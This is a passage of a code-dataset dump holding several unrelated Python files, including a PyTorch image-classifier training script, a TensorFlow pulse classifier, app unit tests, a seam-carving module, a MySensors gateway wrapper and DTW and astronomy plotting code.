'polynet':\n model_ft = pretrainedmodels.polynet(num_classes=1000, pretrained='imagenet')\n num_ftrs = model_ft.last_linear.in_features\n model_ft.last_linear = nn.Linear(num_ftrs, num_classes)\nelif model_name == 
'mnasnet1_0':\n    model_ft = models.mnasnet1_0(pretrained=True)\n    num_ftrs = model_ft.classifier[1].in_features\n    model_ft.classifier[1] = nn.Linear(num_ftrs, num_classes)\nelif model_name == 'efficientnet-b0':\n    model_ft = EfficientNet.from_pretrained('efficientnet-b0', num_classes=num_classes)\nelif model_name == 'efficientnet-b1':\n    model_ft = EfficientNet.from_pretrained('efficientnet-b1', num_classes=num_classes)\nelif model_name == 'efficientnet-b2':\n    model_ft = EfficientNet.from_pretrained('efficientnet-b2', num_classes=num_classes)\nelif model_name == 'efficientnet-b3':\n    model_ft = EfficientNet.from_pretrained('efficientnet-b3', num_classes=num_classes)\nelif model_name == 'efficientnet-b4':\n    model_ft = EfficientNet.from_pretrained('efficientnet-b4', num_classes=num_classes)\nelif model_name == 'efficientnet-b5':\n    model_ft = EfficientNet.from_pretrained('efficientnet-b5', num_classes=num_classes)\nelif model_name == 'efficientnet-b6':\n    model_ft = EfficientNet.from_pretrained('efficientnet-b6', num_classes=num_classes)\nelse:\n    print(\"Invalid model name, exiting...\")\n    exit()\n\n# Transfer the model to GPU\n# Set default device as gpu, if available\ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\n# model_ft = nn.DataParallel(model_ft)\nmodel_ft = model_ft.to(device)\n\n# Print model summary\nprint('Model Summary:-\\n')\nfor num, (name, param) in enumerate(model_ft.named_parameters()):\n    print(num, name, param.requires_grad)\nif model_name == 'inception':\n    summary(model_ft, input_size=(3, 299, 299))\nelif model_name in ('densenet121', 'densenet161'):\n    pass\nelse:\n    summary(model_ft, input_size=(3, img_size, img_size))\nprint(model_ft)\n\npytorch_total_params = sum(p.numel() for p in model_ft.parameters() if p.requires_grad)\n# print(\"Total parameters:\", pytorch_total_params)\n# Loss function\ncriterion = nn.CrossEntropyLoss()\n\n# Optimizer \noptimizer_ft = optim.SGD(model_ft.parameters(), lr=0.001, momentum=0.9)\n\n# Learning rate decay\nexp_lr_scheduler = lr_scheduler.StepLR(optimizer_ft, step_size=7, gamma=0.1)\n\n# Model training routine \nprint(\"\\nTraining:-\\n\")\n\n\ndef train_model(model, criterion, optimizer, scheduler, num_epochs=30):\n    since = time.time()\n\n    best_model_wts = copy.deepcopy(model.state_dict())\n    best_train_acc = 0.0\n    best_train_epoch = 0\n    best_val_epoch = 0\n    best_val_acc = 0.0\n\n    # Tensorboard summary\n    writer = SummaryWriter(log_dir=('./runs/' + model_name))\n\n    for epoch in range(num_epochs):\n        print('Epoch {}/{}'.format(epoch, num_epochs - 1))\n        print('-' * 10)\n\n        # Each epoch has a training and validation phase\n        for phase in ['train', 'valid']:\n            if phase == 'train':\n                model.train()  # Set model to training mode\n            else:\n                model.eval()  # Set model to evaluate mode\n\n            running_loss = 0.0\n            running_corrects = 0\n\n            # Iterate over data.\n            for inputs, labels in dataloaders[phase]:\n                inputs = inputs.to(device, non_blocking=True)\n                labels = labels.to(device, non_blocking=True)\n\n                # zero the parameter gradients\n                optimizer.zero_grad()\n\n                # forward\n                # track history only if in train\n                with torch.set_grad_enabled(phase == 'train'):\n                    outputs = model(inputs)\n                    _, preds = torch.max(outputs, 1)\n                    loss = criterion(outputs, labels)\n\n                    # backward + optimize only if in training phase\n                    if phase == 'train':\n                        loss.backward()\n                        optimizer.step()\n\n                # statistics\n                running_loss += loss.item() * inputs.size(0)\n                running_corrects += torch.sum(preds == labels.data)\n            if phase == 'train':\n                scheduler.step()\n\n            epoch_loss = 
running_loss / dataset_sizes[phase]\n epoch_acc = running_corrects.double() / dataset_sizes[phase]\n\n print('{} Loss: {:.4f} Acc: {:.4f}'.format(\n phase, epoch_loss, epoch_acc))\n\n # Record training loss and accuracy for each phase\n if phase == 'train':\n writer.add_scalar('Train/Loss', epoch_loss, epoch)\n writer.add_scalar('Train/Accuracy', epoch_acc, epoch)\n writer.flush()\n if epoch_acc > best_train_acc:\n best_train_acc = epoch_acc\n best_train_epoch = epoch\n else:\n writer.add_scalar('Valid/Loss', epoch_loss, epoch)\n writer.add_scalar('Valid/Accuracy', epoch_acc, epoch)\n writer.flush()\n\n # deep copy the model\n if phase == 'valid' and epoch_acc > best_val_acc:\n best_val_acc = epoch_acc\n best_model_wts = copy.deepcopy(model.state_dict())\n best_val_epoch = epoch\n print()\n\n time_elapsed = time.time() - since\n\n with open('train_performance.csv', 'a+', newline='') as write_obj:\n csv_writer = csv.writer(write_obj)\n csv_writer.writerow([model_name, '{:.0f}m {:.0f}s'.format(\n time_elapsed // 60, time_elapsed % 60), pytorch_total_params, '{:4f}'.format(best_train_acc.cpu().numpy()),\n best_train_epoch, '{:4f}'.format(best_val_acc.cpu().numpy()), best_val_epoch])\n\n # load best model weights\n model.load_state_dict(best_model_wts)\n return model\n\n\n# Train the model\nmodel_ft = train_model(model_ft, criterion, optimizer_ft, exp_lr_scheduler,\n num_epochs=num_epochs)\n# Save the entire model\nprint(\"\\nSaving the model...\")\ntorch.save(model_ft, PATH)\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":14786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112771977","text":"import numpy as np\r\nimport tensorflow as tf\r\nimport random\r\nimport Parameters\r\nimport Net\r\nfrom Data import CreateDataWithLabel1, Accuracy\r\n\r\nresult = []\r\nfor num in range(100):\r\n # Import Data\r\n pulset = np.load(\"gpulse.npy\")\r\n labelt = np.load(\"glabel.npy\")\r\n\r\n n_total = labelt.shape[0]\r\n print(\"数据集中共有%d人\" % (n_total))\r\n r = 0\r\n while 1:\r\n idx = list(range(n_total))\r\n random.shuffle(idx)\r\n\r\n pulse_train_people = pulset[idx[0:Parameters.n_examples]]\r\n pulse_test_people = pulset[idx[Parameters.n_examples:n_total]]\r\n label_train_people = labelt[idx[0:Parameters.n_examples]]\r\n label_test_people = labelt[idx[Parameters.n_examples:n_total]]\r\n p_train = 0\r\n n_train = 0\r\n p_test = 0\r\n n_test = 0\r\n\r\n for i in range(label_train_people.shape[0]):\r\n if label_train_people[i] == 0:\r\n n_train += 1\r\n else:\r\n p_train += 1\r\n print(\"训练集中\")\r\n print(\"怀孕%d人\" % (p_train))\r\n print(\"未怀孕%d人\" % (n_train))\r\n\r\n for i in range(label_test_people.shape[0]):\r\n if label_test_people[i] == 0:\r\n n_test += 1\r\n else:\r\n p_test += 1\r\n print(\"测试集中\")\r\n print(\"怀孕%d人\" % (p_test))\r\n print(\"未怀孕%d人\" % (n_test))\r\n r = p_test / (p_test + n_test)\r\n print(\"怀孕人数占比%.2f\" % (r))\r\n if r > 0.6 or r < 0.4:\r\n print(\"测试集中怀孕人数比例过高或过低,重新分组\")\r\n else:\r\n break\r\n\r\n pulse_train, label_train = CreateDataWithLabel1(\r\n pulse_train_people, label_train_people)\r\n pulse_test, label_test = CreateDataWithLabel1(\r\n pulse_test_people, label_test_people)\r\n\r\n for i in range(pulse_train.shape[0]):\r\n pmax = max(pulse_train[i])\r\n pmin = min(pulse_train[i])\r\n pulse_train[i] = (2 * pulse_train[i] - pmin - pmax) / (pmax - pmin)\r\n\r\n for i in range(pulse_test.shape[0]):\r\n pmax = max(pulse_test[i])\r\n pmin = min(pulse_test[i])\r\n pulse_test[i] = (2 * 
pulse_test[i] - pmin - pmax) / (pmax - pmin)\r\n\r\n print(\"数据处理完成\")\r\n\r\n # Tensorflow\r\n x = tf.placeholder('float', [None, Parameters.input_size])\r\n y = tf.placeholder('float', [None, Parameters.output_size])\r\n\r\n keep_probs = tf.placeholder('float', [None])\r\n pred = Net.ResNet(x)\r\n\r\n loss = -tf.reduce_mean(y * tf.log(pred))\r\n\r\n #loss = tf.reduce_mean(tf.square(pred-y))\r\n '''\r\n n_pregnancy = 0\r\n n_npregnancy = 0\r\n for i in range(labelt.size):\r\n if labelt[i] > Parameters.PWeek:\r\n label.append([1,0])\r\n pulse.append(pulset[i][period[i][0]:(period[i][0]+Parameters.input_size)])\r\n n_pregnancy += 1\r\n elif labelt[i] == 0:\r\n label.append([0,1])\r\n pulse.append(pulset[i][period[i][0]:(period[i][0]+Parameters.input_size)])\r\n n_npregnancy += 1\r\n print(n_pregnancy, n_npregnancy)\r\n '''\r\n global_step = tf.Variable(0)\r\n learning_rate = tf.train.exponential_decay(\r\n 0.05, global_step, 1000, 0.96, staircase=True)\r\n optm = tf.train.GradientDescentOptimizer(\r\n learning_rate).minimize(loss, global_step=global_step,)\r\n\r\n correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(pred, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\r\n\r\n init_op = tf.global_variables_initializer()\r\n savedir = \"tmp/\"\r\n saver = tf.train.Saver(max_to_keep=5)\r\n with tf.Session() as sess:\r\n sess.run(init_op)\r\n coord = tf.train.Coordinator()\r\n threads = tf.train.start_queue_runners(coord=coord)\r\n pulse_train = np.array(pulse_train)\r\n label_train = np.array(label_train)\r\n pulse_train = pulse_train.astype('float')\r\n\r\n n_train = pulse_train.shape[0]\r\n print(n_train)\r\n num_batch = int(n_train / Parameters.Batch_size)\r\n idx_ = list(range(n_train))\r\n TT = []\r\n TRAIN_ACC = []\r\n TEST_ACC = []\r\n for epoch in range(Parameters.Epoch):\r\n total_cost = 0\r\n random.shuffle(idx_)\r\n for i in range(num_batch):\r\n pulse_in = pulse_train[idx_[\r\n i * Parameters.Batch_size:(i + 1) * Parameters.Batch_size], :]\r\n label_in = label_train[idx_[\r\n i * Parameters.Batch_size:(i + 1) * Parameters.Batch_size], :]\r\n feeds = {x: pulse_in, y: label_in}\r\n sess.run(optm, feed_dict=feeds)\r\n total_cost += sess.run(loss, feed_dict=feeds)\r\n\r\n pred_train = sess.run(pred, feed_dict={x: pulse_train})\r\n\r\n TRAIN_ACC.append(sess.run(accuracy, feed_dict={\r\n x: pulse_train, y: label_train}))\r\n TT.append(total_cost)\r\n\r\n m_pred = sess.run(pred, feed_dict={x: pulse_test})\r\n acc = Accuracy(m_pred, label_test)\r\n print('测试集精确率', acc)\r\n\r\n TEST_ACC.append(acc)\r\n print(\"训练完成\")\r\n # np.savetxt('TT.txt', np.array(TT) )\r\n # np.savetxt('TR.txt', np.array(TRAIN_ACC))\r\n # np.savetxt('TE.txt',np.array(TEST_ACC))\r\n saver.save(sess, savedir + 'pulseend')\r\n coord.request_stop()\r\n coord.join(threads)\r\n result.append(acc)\r\nprint(result)\r\n","sub_path":"yuyan/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"163116568","text":"#-*- coding:utf-8 -*-\n\nfrom app.collection.models import Watchlist\nfrom app.collection.tasks import add_to_watchlist, find_torrents_for_movies\nfrom app.core.models import Notification\nfrom app.movies.models import Movie\nfrom app.torrents.models import Torrent\n\nfrom tests import BaseTestCase, UserFactory\n\n\nclass AddToWatchlistTaskTestCase(BaseTestCase):\n def test_add_missing_movies_to_watchlist(self):\n with self.instance.test_request_context() as request:\n 
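# create and commit a user fixture so the task under test gets a valid user id\n            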
u = UserFactory()\n self.db.session.commit()\n\n user_id = u.id\n\n keys = ['movie:tt0167260:imdb', 'movie:tt1229238:imdb',\n 'movie:tt1272878:imdb']\n\n add_to_watchlist(keys=keys, user_id=user_id)\n\n watchlist = self.db.session.query(Watchlist).filter_by(\n user_id=user_id).all()\n\n notifications = self.db.session.query(Notification).filter_by(\n status=Notification.SUCCESS_STATUS).all()\n\n self.assertEqual(len(watchlist), 3)\n self.assertEqual(len(notifications), 1)\n\n def test_add_movies_to_watchlist(self):\n with self.instance.test_request_context() as request:\n u = UserFactory()\n self.db.session.commit()\n\n user_id = u.id\n\n keys = ['movie:tt0167260:imdb', 'movie:tt1229238:imdb',\n 'movie:tt1272878:imdb']\n\n Movie.add(keys=keys)\n\n add_to_watchlist(keys=keys, user_id=user_id)\n\n watchlist = self.db.session.query(Watchlist).filter_by(\n user_id=user_id).all()\n\n notifications = self.db.session.query(Notification).filter_by(\n status=Notification.SUCCESS_STATUS).all()\n\n self.assertEqual(len(watchlist), 3)\n self.assertEqual(len(notifications), 1)\n\n\nclass FindTorrentsForMoviesTestCase(BaseTestCase):\n def test_find_torrents_for_movies(self):\n keys = ['movie:tt0167260:imdb', 'movie:tt1229238:imdb',\n 'movie:tt1272878:imdb']\n\n movies = Movie.add(keys=keys)\n self.assertEqual(len(movies), 3)\n\n find_torrents_for_movies(keys=keys)\n\n torrents = self.db.session.query(Torrent).all()\n self.assertTrue(len(torrents) > 0)\n\n torrents = self.db.session.query(Torrent).join(\n Movie.torrents).filter(Movie.id == 2).all()\n self.assertEqual(len(torrents), 5)\n\n notifications = self.db.session.query(Notification).filter_by(\n status=Notification.INFO_STATUS).all()\n self.assertEqual(len(notifications), 1)\n","sub_path":"tests/collection/test_tasks.py","file_name":"test_tasks.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"277504826","text":"from dskc.clean import get_text_from\nfrom dskc.visualization import graphs\nfrom dskc.visualization.graphs.types.word_cloud.word_cloud import word_cloud, text_proportion_success\nfrom dskc._util.string import get_display_text\nimport pandas as pd\nfrom . 
import util\nfrom matplotlib import pyplot as plt\n\n\ndef _wordcloud(series, section_number, sub_section, display_name, stop_words):\n sub_section = util.header(section_number, sub_section, \"{} Word Cloud\".format(display_name))\n\n word_cloud(series, stop_words=stop_words)\n return sub_section\n\n\ndef _top_words(words_series, top_words, section_number, sub_section, display_name):\n sub_section = util.header(section_number, sub_section, \"{} Top {} Words\".format(display_name, top_words))\n\n graphs.bars(words_series,\n title=\"Top {} words\".format(top_words),\n xlabel=\"Word\",\n percentage_on_top=True,\n max_values=top_words)\n\n return sub_section\n\n\ndef _text_proportion_succcess(series, words_series, target_series, target_true, top_words, section_number, sub_section,\n display_name):\n sub_section = util.header(section_number, sub_section,\n \"{} Mean Success of Top {} Words\".format(display_name, top_words))\n\n text_proportion_success(words_series, series, target_series,\n target_true=target_true)\n return sub_section\n\n\ndef text_col(df, name, target=None, target_true=False, section_number=1, top_words=15, stop_words=[]):\n # get names\n display_name = get_display_text(name)\n sub_section = 1\n\n # set series\n series = df[name]\n\n # wordcloud\n sub_section = _wordcloud(series, section_number, sub_section, display_name, stop_words)\n\n # bars graph\n text = get_text_from(series, stop_words=stop_words)\n\n # set word series\n words = text.split(\" \")\n words_series = pd.Series(words)\n\n # top n words\n sub_section = _top_words(words_series, top_words, section_number, sub_section, display_name)\n\n # text proportion graphs\n if not target is None:\n try:\n _text_proportion_succcess(series,\n words_series,\n df[target],\n target_true,\n top_words,\n section_number,\n sub_section,\n display_name)\n except:\n plt.show()\n print(\"\\nNot available.\\n\")\n","sub_path":"dskc/visualization/graphs/shortcuts/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"192582817","text":"\n\n\ndef write_detail(id,text,mod):\n with open(r'./client/data_storage/train_detail_%s.log' % id, mod, encoding='UTF-8') as f:\n if mod != 'r+':\n f.write(text)\n else:\n old = f.read()\n f.seek(0)\n f.write(text)\n f.write(old)\n","sub_path":"test/client/federation/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":292,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"156881832","text":"import numpy as np\n\n\ndef get_intensity(img):\n weights = np.array([0.299, 0.587, 0.114])\n return img @ weights\n\n\ndef get_intensity_with_mask(intensities, mask):\n intensity_with_mask = intensities.copy()\n\n h, w = intensities.shape\n intensity_with_mask += h * w * 256 * mask\n\n return intensity_with_mask\n\n\ndef get_intensities_sum(grad_intensity):\n intensity_sum = grad_intensity.copy()\n h, w = grad_intensity.shape\n for i in range(1, h):\n add = np.zeros(w)\n last_block = np.array([intensity_sum[i - 1, 1:-1], intensity_sum[i - 1, 2:], intensity_sum[i - 1, :-2]])\n add[1:-1] = np.min(last_block, axis=0)\n add[0] = np.min(intensity_sum[i - 1, :2])\n add[-1] = np.min(intensity_sum[i - 1, -2:])\n intensity_sum[i] += add\n\n return intensity_sum\n\n\ndef get_min_seam(sum_intensity):\n seam = np.zeros(sum_intensity.shape)\n h, w = sum_intensity.shape[:2]\n y = np.argmin(sum_intensity[h - 1])\n seam[h - 1, y] = 1\n for x in 
range(h - 1, -1, -1):\n start = max(0, y - 1)\n end = min(y + 2, w)\n diff = np.argmin(sum_intensity[x, start: end])\n y = start + diff\n seam[x, y] = 1\n return seam\n\n\ndef get_grad_intensity(image):\n I_x = np.roll(image, 1, axis=0) - np.roll(image, -1, axis=0)\n I_y = np.roll(image, 1, axis=1) - np.roll(image, -1, axis=1)\n I_x[0, :] = image[1, :] - image[0, :]\n I_x[-1, :] = image[-1, :] - image[-2, :]\n I_y[:, 0] = image[:, 1] - image[:, 0]\n I_y[:, -1] = image[:, -1] - image[:, -2]\n intensity_grad = (I_x ** 2 + I_y ** 2) ** 0.5\n return intensity_grad\n\n\ndef get_seam_mask(seam, shape):\n mask = np.zeros(shape)\n rows = list(range(len(seam)))\n mask[rows, seam] = 1\n return mask\n\n\ndef shrink_seam(new_image, mask, min_seam):\n for index, pixel_to_shrink in enumerate(min_seam):\n new_image[index, pixel_to_shrink: -1] = new_image[index, pixel_to_shrink + 1:]\n if mask is not None:\n mask[index, pixel_to_shrink: -1] = mask[index, pixel_to_shrink + 1:]\n new_image = new_image[:-1]\n if mask is not None:\n mask = mask[:-1]\n return new_image, mask\n\n\ndef expand_seam(new_image, mask, min_seam):\n h, w, d = new_image.shape\n big_image = np.zeros((h, w + 1, d))\n big_image[:, :-1] = new_image\n big_mask = mask\n # print('image shape: ', new_image.shape, 'big image shape: ', big_image.shape)\n if mask is not None:\n big_mask = np.zeros((h, w + 1))\n big_mask[:, :-1] = mask\n for index, pixel_to_expand in enumerate(min_seam):\n if pixel_to_expand == w - 1:\n value_to_add = new_image[index, pixel_to_expand]\n else:\n value_to_add = np.mean(new_image[index, pixel_to_expand:pixel_to_expand + 2])\n # print('image shape: ', new_image[index, pixel_to_expand:].shape, 'big image shape: ',\n # big_image[index, pixel_to_expand + 1:].shape)\n big_image[index, pixel_to_expand + 1:] = new_image[index, pixel_to_expand:]\n big_image[index, pixel_to_expand + 1] = value_to_add\n if mask is not None:\n big_mask[index, pixel_to_expand + 1:] = mask[index, pixel_to_expand:]\n big_mask[index, pixel_to_expand] = 1\n return big_image, big_mask\n\n\ndef seam_carve(image, mode, mask=None):\n # if mask is not None:\n # print(mode, 'with mask')\n # else:\n # print(mode)\n\n new_image = image.copy()\n intensity = get_intensity(new_image)\n grad_intensity = get_grad_intensity(intensity) # get_grad_intensity(intensity)\n\n if mask is not None:\n grad_intensity = get_intensity_with_mask(grad_intensity, mask)\n\n if 'vertical' in mode:\n grad_intensity = grad_intensity.T\n if mask is not None:\n mask = mask.T\n new_image = new_image.transpose((1, 0, 2))\n\n intensity_sum = get_intensities_sum(grad_intensity)\n min_seam = get_min_seam(intensity_sum)\n # seam_mask = get_seam_mask(min_seam, new_image.shape[:2])\n seam = get_min_seam(intensity_sum)\n\n # print(len(min_seam))\n # print(new_image.shape)\n\n # if 'shrink' in mode:\n # new_image, mask = shrink_seam(new_image, mask, min_seam)\n # if 'expand' in mode:\n # new_image, mask = expand_seam(new_image, mask, min_seam)\n\n if 'vertical' in mode:\n if mask is not None:\n mask = mask.T\n seam = seam.T\n # # new_image = new_image.transpose((1, 0, 2))\n\n return image, mask, seam\n","sub_path":"gml 02 Scaling/seam_carve.py","file_name":"seam_carve.py","file_ext":"py","file_size_in_byte":4442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"38323623","text":"'''\nCreated on 12 sept. 
2015\n\n@author: doudz\n'''\nfrom pySensors.MyController import Gateway\nimport threading\nfrom pySensors.MySensor import MySensor,AUTO,build\nimport time\nfrom pySensors.MyMessage import MyMessage,mSetCommand\n\nSLEEP = 1/10.\n\nclass pyGateway(Gateway, threading.Thread):\n \"\"\" MySensors gateway \"\"\"\n\n def __init__(self, event_callback=None, persistence=False,\n persistence_file=\"mysensors.pickle\", protocol_version=\"1.5\"):\n threading.Thread.__init__(self)\n Gateway.__init__(self, event_callback, persistence, persistence_file,\n protocol_version)\n self._stop_event = threading.Event()\n self.gw = MySensor()\n self.gw.begin(self._callback,0,True,0)\n \n def _callback(self,gw,message):\n data = u'{0.sender};{0.destination};{0.command};{0.ack};{0.type};{0.payload}'.format(message)\n print(type(data),data)\n# response = self.logic(data)\n response = self.logic(message)\n print('response',response)\n if response:\n print('response',response.encode())\n print(response.node_id,response.child_id,response.type,response.ack,response.sub_type,response.payload)\n msg = MyMessage(response.node_id,response.sub_type)\n print('type,command',response.type)\n print('subtype,type',response.sub_type)\n msg.sender = gw.nc.nodeId\n msg.destination = response.node_id\n msg.miSetRequestAck(response.ack)\n msg.miSetCommand(response.type)\n if response.sub_type in [4,8]:\n msg.set_byte(chr(response.payload))\n else:\n msg.set(response.payload)\n #msg.set_byte(chr(response.payload))\n print(msg.data)\n gw.sendRoute(msg)\n \n\n def stop(self):\n \"\"\" Stops the background thread. \"\"\"\n self._stop_event.set()\n\n def run(self):\n \"\"\" Background thread that reads messages from the gateway. \"\"\"\n while not self._stop_event.is_set():\n self.gw.process()\n time.sleep(SLEEP)\n \n# try:\n# msg = line.decode('utf-8')\n# response = self.logic(msg)\n# except ValueError:\n# LOGGER.warning('Error decoding message from gateway, probably received bad byte.')\n# continue\n# if response is not None:\n# try:\n# self.send(response.encode())\n# except ValueError:\n# LOGGER.exception('Invalid response')\n# continue\n\n def send(self, message):\n \"\"\" Writes a Message to the gateway. 
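The serial write below is currently commented out, so the message is only printed. 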
\"\"\"\n print('send',message)\n# self.serial.write(message.encode())\n\n\ndef RepeaterNode():\n print('Starting RepeaterNode, press Ctrl+C to exit')\n gw = MySensor()\n # The third argument enables repeater mode.\n gw.begin(None, AUTO, True);\n #Send the sensor node sketch version information to the gateway\n gw.sendSketchInfo(\"Repeater Node\", \"1.0\");\n try:\n while True:\n gw.process()\n time.sleep(SLEEP)\n except KeyboardInterrupt:\n print(\"\\n Program stopped \\n\")\n \ndef pGateway(callback):\n print('Starting Gateway, press Ctrl+C to exit')\n gw = MySensor()\n gw.begin(callback,0,True,0)\n \n try:\n while True:\n gw.process()\n time.sleep(SLEEP)\n except KeyboardInterrupt:\n print(\"\\n Program stopped \\n\")\n \n \nif __name__ == '__main__':\n #RepeaterNode()\n \n def mycallback(message):\n print(message)\n \n Gateway(mycallback)\n \n \n \n \n","sub_path":"pySensors/contrib.py","file_name":"contrib.py","file_ext":"py","file_size_in_byte":3711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"612374092","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\ndef plotting(x, y, e, f, path,fig,L,colour):\n \n \n xaxis = [x1[0] for x1 in path]\n yaxis = [y1[1] for y1 in path]\n \n q = np.arange(0,len(xaxis),1)\n \n for j in q:\n e.append(xaxis[j])\n \n for k in q:\n f.append(yaxis[k])\n \n plt.figure(fig)\n \n plt.plot(xaxis,yaxis,colour,label='Column number ' + L +' in the X-ray data matrix')\n \n plt.legend()\n \n plt.title('Alignment between UV and X-ray data')\n \n plt.xlabel('UV data')\n plt.ylabel('X-ray data')\n \n plt.show()\n \n return(e,f)\n\n\n\n\ndef plotting1(x, y, path,fig,L,colour):\n \n \n xaxis = [x1[0] for x1 in path]\n yaxis = [y1[1] for y1 in path]\n \n plt.figure(fig)\n \n plt.plot(xaxis,yaxis,colour,label=L)\n \n plt.legend()\n \n plt.title('Comparison between DTW and FastDTW alignment')\n \n plt.xlabel('UV Data')\n plt.ylabel('X-ray Data')\n \n plt.show()\n\n\n\n\ndef plotting2(y, path,fig,L,colour):\n \n plt.figure(fig)\n \n plt.plot(y,colour,label='Column number ' + L +' in the X-ray data matrix')\n \n plt.legend()\n \n plt.title('X-ray data by column')\n \n plt.xlabel('Time')\n plt.ylabel('X-ray Data')\n \n plt.show()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"dtwpy/plotTest.py","file_name":"plotTest.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"261315414","text":"#!/usr/bin/python\n# encoding=utf8\nimport sys\nreload(sys)\nsys.setdefaultencoding('utf8')\n\nimport os\nimport subprocess\nimport math\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom astropy.table import Table, Column \nfrom scipy.stats import linregress\nfrom scipy import interpolate\nfrom scipy import polyval, polyfit\nfrom scipy import odr\nimport pylab as py\nfrom matplotlib import gridspec\nimport sklearn.datasets as ds\nfrom sklearn.decomposition import PCA\nfrom sklearn.preprocessing import StandardScaler\n\nfrom redTools import *\nfrom Kcorrect import *\nfrom linear_mcmc import *\n################################################################# \ndef add_axis(ax, xlim, ylim):\n \n x1, x2 = xlim[0], xlim[1]\n y1, y2 = ylim[0], ylim[1]\n ax.set_xlim(x1, x2)\n ax.set_ylim(y1, y2)\n\n ax.minorticks_on()\n ax.tick_params(which='major', length=7, width=1.5)\n ax.tick_params(which='minor', length=4, color='#000033', width=1.0) \n \n # additional Y-axis (on the right)\n 
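# twinx() shares the x-axis and adds an independent y-axis on the right\n    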
y_ax = ax.twinx()\n y_ax.set_ylim(y1, y2)\n y_ax.set_yticklabels([])\n y_ax.minorticks_on()\n y_ax.tick_params(which='major', length=7, width=1.5, direction='in')\n y_ax.tick_params(which='minor', length=4, color='#000033', width=1.0, direction='in')\n\n # additional X-axis (on the top)\n x_ax = ax.twiny()\n x_ax.set_xlim(x1, x2)\n x_ax.set_xticklabels([])\n x_ax.minorticks_on()\n x_ax.tick_params(which='major', length=7, width=1.5, direction='in')\n x_ax.tick_params(which='minor', length=4, color='#000033', width=1.0, direction='in')\n \n for tick in ax.xaxis.get_major_ticks():\n tick.label.set_fontsize(12) \n for tick in ax.yaxis.get_major_ticks():\n tick.label.set_fontsize(12) \n \n########################################################### Begin\ndef plot_array(inFile, scatter=False, binned=True):\n \n R, Input_u1, T_u1 = getBand(inFile, band1 = 'u', band2 = 'w1')\n R, Input_g1, T_g1 = getBand(inFile, band1 = 'g', band2 = 'w1')\n R, Input_r1, T_r1 = getBand(inFile, band1 = 'r', band2 = 'w1')\n R, Input_i1, T_i1 = getBand(inFile, band1 = 'i', band2 = 'w1')\n R, Input_z1, T_z1 = getBand(inFile, band1 = 'z', band2 = 'w1')\n Input1 = {} ; T1 = {}\n T1[\"u\"] = T_u1\n T1[\"g\"] = T_g1\n T1[\"r\"] = T_r1\n T1[\"i\"] = T_i1\n T1[\"z\"] = T_z1\n Input1[\"u\"] = Input_u1\n Input1[\"g\"] = Input_g1\n Input1[\"r\"] = Input_r1\n Input1[\"i\"] = Input_i1\n Input1[\"z\"] = Input_z1\n \n R, Input_u2, T_u2 = getBand(inFile, band1 = 'u', band2 = 'w2')\n R, Input_g2, T_g2 = getBand(inFile, band1 = 'g', band2 = 'w2')\n R, Input_r2, T_r2 = getBand(inFile, band1 = 'r', band2 = 'w2')\n R, Input_i2, T_i2 = getBand(inFile, band1 = 'i', band2 = 'w2')\n R, Input_z2, T_z2 = getBand(inFile, band1 = 'z', band2 = 'w2')\n Input2 = {} ; T2 = {}\n T2[\"u\"] = T_u2\n T2[\"g\"] = T_g2\n T2[\"r\"] = T_r2\n T2[\"i\"] = T_i2\n T2[\"z\"] = T_z2\n Input2[\"u\"] = Input_u2\n Input2[\"g\"] = Input_g2\n Input2[\"r\"] = Input_r2\n Input2[\"i\"] = Input_i2\n Input2[\"z\"] = Input_z2 \n \n \n dye = {\"u\":\"blue\",\"g\":\"green\",\"r\":\"red\",\"i\":\"orange\",\"z\":\"maroon\",\"w1\":\"purple\" }\n \n fig = py.figure(figsize=(5, 4), dpi=100) \n fig.subplots_adjust(wspace=0, top=0.95, bottom=0.15, left=0.15, right=0.98)\n \n gs = gridspec.GridSpec(1, 1, height_ratios=[1]) \n\n p = 0\n ####################################################\n \n band_lst = ['r']\n \n for jj in range(1):\n \n \n for band in band_lst:\n \n ylabel=True\n xlabel=True\n \n ax = plt.subplot(gs[p]) ; p+=1\n plot_Rinc(ax, T1[band], Input1[band], T2[band], Input2[band], color=dye[band], scatter=scatter, binned=binned, xlabel=xlabel, ylabel=ylabel, band=band)\n yticks = ax.yaxis.get_major_ticks()\n #if band!='u': yticks[-1].label1.set_visible(False)\n #if band!='u': plt.setp(ax.get_yticklabels(), visible=False) \n \n #####################################################\n \n plt.subplots_adjust(hspace=.0, wspace=0)\n\n ax = fig.add_subplot(111)\n ax.set_axis_off()\n ax.set_xticks([])\n ax.set_yticks([])\n ax.xaxis.set_ticks_position('none')\n ax.yaxis.set_ticks_position('none') \n #ax.annotate(r'$A_{W2}-A_{W1} \\/\\/ [mag]$', (0.008,0.56), xycoords='figure fraction', size=16, color='black', rotation=90)\n \n #ax.annotate(r'$inclination \\/ [deg]$', (0.52,0.02), xycoords='figure fraction', size=16, color='black')\n \n fig.savefig(\"P0_w12.eps\")\n fig.savefig(\"P0_w12.png\")\n plt.show()\n \n################################################################## \ndef plot_Rinc(ax, T1, Input1, T2, Input2, color='red', scatter=False, binned=False, 